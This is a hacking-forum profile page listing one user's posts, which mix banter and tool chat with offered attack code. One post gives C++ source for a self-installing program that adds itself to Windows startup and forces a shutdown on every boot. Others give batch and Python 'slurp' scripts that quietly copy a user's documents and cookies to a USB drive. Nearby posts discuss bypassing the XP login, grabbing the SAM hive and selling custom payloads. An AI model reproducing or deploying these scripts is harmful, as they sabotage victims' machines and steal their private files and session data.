Jump to content

DingleBerries

Dedicated Members
  • Posts

    1,291
  • Joined

  • Last visited

Everything posted by DingleBerries

  1. Load iPod linux and use it to bypass XP login screen.
  2. Ha, you got to it first. Great job, works as described. The only thing is the legality of using windows PE. I am working on some other things at that my help clear that up and just automate the process. Shot me a PM and maybe we can work on it together.
  3. BackBone, What is the chip number on the DTV box you have(Broadcom). I personally do not know what to believe. Its plausibleness, but without multiple photos it may be highly unlikely. EDIT: Seems like a few people have already taken theres apart;
  4. http://www.infowars.com/camera-microphone-...conversion-box/
  5. #include <iostream> #include <stdlib.h> #include <windows.h> #include <iomanip> #include <stdio.h> #include <conio.h> #include <fstream> using namespace std; int main() { keybd_event(VK_MENU,0x38,0,0); keybd_event(VK_RETURN,0x1c,0,0); keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0); keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); HANDLE outToScreen; outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); { char buffer[255]; char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat"; ifstream input(inputFile); if (!input) { { ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app); fp << "@ECHO OFF \n"; fp << "START C:\\rawr.exe \n"; fp << "EXIT"; } } else { while (!input.eof()) { input.getline(buffer,255); } } } { char buffer[255]; char inputFile[]="C:\\rawr.exe"; ifstream input(inputFile); if (!input) { { { ofstream fp("CLICK.bat", ios::app); fp << "@ECHO OFF \n"; fp << "COPY matrix.exe C:\\rawr.exe \n"; fp << "START C:\\rawr.exe \n"; fp << "EXIT"; } system("START CLICK.bat"); main(); } } else { while (!input.eof()) { input.getline(buffer,255); system("call shutdown.exe -S"); goto START; } } } START:{ for(int i = 0; i < 1; i++) { int num = (rand() % 10); SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY); cout << setw(4) << num; cout << setw(4) << "0%"; cout << setw(4) << "P"; cout << setw(4) << " "; cout << setw(4) << ")"; cout << setw(4) << "#"; cout << setw(4) << "X"; cout << setw(4) << "@"; cout << setw(4) << "1&"; cout << setw(4) << "*"; cout << setw(4) << "||"; cout << setw(4) << " \a"; Sleep(60); } } for ( int j = 0; j < 5; j++) { SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); int number = (rand() % 24); cout << setw(4) << number; } goto START; }
  6. @echo off mkdir %~d0\%computername% ::Plain Text Files xcopy "C:\Documents and Settings\%username%\My Documents\*.pdf" %~d0\%computername%\ /s/c/q/r/h/y Thatll do donkey, thatll do...
  7. If you lock down a system right then policy will not allow you to run those types of programs. I have yet to run into one myself, however there are boxes that restrict those types of applications. EDIT: On a military base i was recently at the public libary computers would not allow vbs or bat
  8. Im going to look at that, used the pocketknife for a day but i like to do my own thing lol. It would be great to have an .ini or something that it reads for extensions, however some systems wont let you run bats or vbs so exes are just easier.
  9. .bat Version @echo off mkdir %~d0\%computername% mkdir %~d0\%computername%\Documents mkdir %~d0\%computername%\Cookies ::Plain Text Files xcopy "C:\Documents and Settings\%username%\My Documents\*.txt" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\Desktop\*.txt" %~d0\%computername%\Documents /s/c/q/r/h/y ::Microsoft Word 2003 and 2007 xcopy "C:\Documents and Settings\%username%\My Documents\*.doc" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\My Documents\*.docx" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\Desktop\*.doc" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\Desktop\*.docx" %~d0\%computername%\Documents /s/c/q/r/h/y ::Microsoft Excel 2003 and 2007 xcopy "C:\Documents and Settings\%username%\My Documents\*.xls" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\My Documents\*.xlsx" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\Desktop\*.xls" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\Desktop\*.xlsx" %~d0\%computername%\Documents /s/c/q/r/h/y ::Microsoft PowerPoint 2003 and 2007 xcopy "C:\Documents and Settings\%username%\My Documents\*.ppt" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\My Documents\*.pptx" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\Desktop\*.pptx" %~d0\%computername%\Documents /s/c/q/r/h/y xcopy "C:\Documents and Settings\%username%\Desktop\*.ppt" %~d0\%computername%\Documents /s/c/q/r/h/y ::COOKIES xcopy "C:\Documents and Settings\%username%\Cookies\*.txt" %~d0\%computername%\Cookies /s/c/q/r/h/y @cls @exit ls python import os,shutil exts = [".txt",".doc",".docx",".xls",".xlsx",".ppt",".pptx"] startpath = "C:\\Documents and Settings\\" def find(none, directory, filenames): for file in filenames: for ext in exts: if file.endswith(ext): fullfile = os.path.join(directory,file) try: shutil.copy(fullfile,file) except IOError: pass # access denied os.path.walk(startpath,find, None) I tried to make on to just grab all pdfs, however i am still unsure about the whole pyinstaller thing. It works on my box but usually not on others. So if it doesnt work just grab the python26.dll and put it in the same dir. Download here
  10. I dont really feel like reading that whole ultiman.exe thread, but if someone gives me the instructions, i.e. move X to X, copy Y to Y, set hive to Z, ect, ill write the exe. I was thinking something along the lines of FreeDOS to boot and grab the SAM(or just something fast, no GUI, automated) so if you can think of other things that need to be grabbed ill work on that as well. Then included a autorun payload for when your logged in(that can also replace ultiman.exe)
  11. Either or doesn't matter. Do you want to use GRUB or windows boot loader? IMO GRUB is better.
  12. PodSlurp U3 Payload only grabs txt, doc, xls, docx, pptx, ppt, ect documents. However they py script is in the Podslurping topic below.
  13. NOD32 + firewall - Warez/"hacking tools"
  14. ls made a great app for that.. read threw a few post for Slurper.
  15. Dingle !fornicate with individuals >18 years of age. Just something I like to do to stay out of jail.
  16. A gay man with an obsession for boxxy is my type of gay man. In a strictly platonic way of course... unless there is LOTs of money and booze involved, then I am yours lol.
  17. Great way for people to spread there bots. "Oh shit they new hazor app... Oh shit i r a zombie nao." There should be some type of invite or something.
  18. My problem is that this is a vague post. There is NO information as to what the problem may be. Obviously in order to help identify and work out any errors, we first need to know what it is that is going on. "My computer is messed up", isnt alot to go by. And the first time is asking people to do it for him/her. Really? If you cant install it you shouldnt use it.
  19. Well hopefully we can get together on this next release. pretty sick stuff in store.
  20. Noobs need to learn how... not to be such noobs? This is a lucrative business and I have made more than my far share of cash from people wanting custom payloads, programing ect. Why not advertise my skill? No one says anything about blogs in peoples sigs. So move along.
  21. Just admit you have no idea what you are talking about.
  22. Thus the "hackerz muh skell" thread starts.
  23. Sniffing doesnt have to have a man in the middle. It can be used to see if a program is calling a server and other useful things. The OP Lawl, its a bit harder than that. Google; ARP poisoning, MITM, Port Spanning, Monitor Mode v. Passive, ect. Install ettercap ng or wireshark if you want a gui or use tcpdump if you want awesomeness
  24. I havent used this software so I do not know how it works exactly, sounds alot like vnc. Would it be possible to turn this into a PE and run it off a thumb drive, that way you get all the interesting benefits, instead of installing it in a vm. After reading this, what i get is that you only installed it in a vm in order to change the ip it monitors. Here is a guide to making a quick PE for it. Dont have any machines to test it on but it ran(slowly) http://arch.kimag.es/share/84634413.png http://arch.kimag.es/share/96389733.png http://arch.kimag.es/share/93034037.png http://arch.kimag.es/share/85852695.png Screenshots fyi, LskTSDat.ini is where the ips the teacher can view are. Editing this will let you view other sources. The teacher setup creates a folder on the C:// drive, not sure if its shared but there may be a fun RCE there.. but Im done playing with it. no reason I would need this
×
×
  • Create New...